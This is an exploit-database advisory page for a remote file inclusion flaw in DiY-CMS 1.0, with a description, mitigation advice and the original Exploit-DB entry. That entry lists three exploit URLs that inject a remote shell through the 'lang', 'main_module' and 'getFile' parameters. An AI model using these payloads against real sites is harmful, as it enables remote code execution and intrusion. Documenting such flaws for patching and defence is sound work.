DiY-CMS 1.0 Remote File Inclusion

vendor:

DiY-CMS

by:

LoSt.HaCkEr and aDaM_TRoJaN

7.5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: DiY-CMS

Affected Version From: v1.0

Affected Version To: v1.0

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows XP

2010

DiY-CMS 1.0 Remote File Inclusion

The DiY-CMS 1.0 version is vulnerable to remote file inclusion. By exploiting this vulnerability, an attacker can execute arbitrary code by including remote files in the vulnerable PHP scripts. The vulnerability exists in the control.block.php, index.php, and general.functions.php files. The attacker can provide a malicious shell in the 'lang' and 'main_module' parameters, allowing them to execute arbitrary code on the target system.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a newer version of the DiY-CMS software that addresses the remote file inclusion vulnerability. Additionally, input validation and sanitization should be implemented to prevent the inclusion of remote files in PHP scripts.

Source

Exploit-DB raw data:

# Exploit Title: [DiY-CMS 1.0 Remote File Inclusion ] 
# Date: [28-8-2010] 
# Author: LoSt.HaCkEr  ~  aDaM_TRoJaN
# Software Link: [http://webscripts.softpedia.com/scriptDownload/DiY-CMS-Download-63258.html] 
# Version: [v 1.0 ] 
# Tested on: [Windows XP] 
# CVE : Hacker town of Musayyib
#Contact: LoSt.HaCkEr[at]yahoo[dot]com ~0r~ aDaM_TRoJaN@yahoo.com~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Exploit: http://target/diycms_v1.0/diycms_v1.0/modules/guestbook/blocks/control.block.php?lang=[SHeLL]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~Exploit: http://target/diycms_v1.0/diycms_v1.0/index.php?main_module=[ShEll]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~Exploit: http://target/diycms_v1.0/diycms_v1.0/includes/general.functions.php?getFile=[SHELL]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

A special tribute to: DannY.iRaQi - TeaM iRaQ HaCkers
		
		function toggle(obj) {
			var el = document.getElementById(obj);
			el.style.display = (el.style.display != 'none' ? 'none' : 'block' );
		}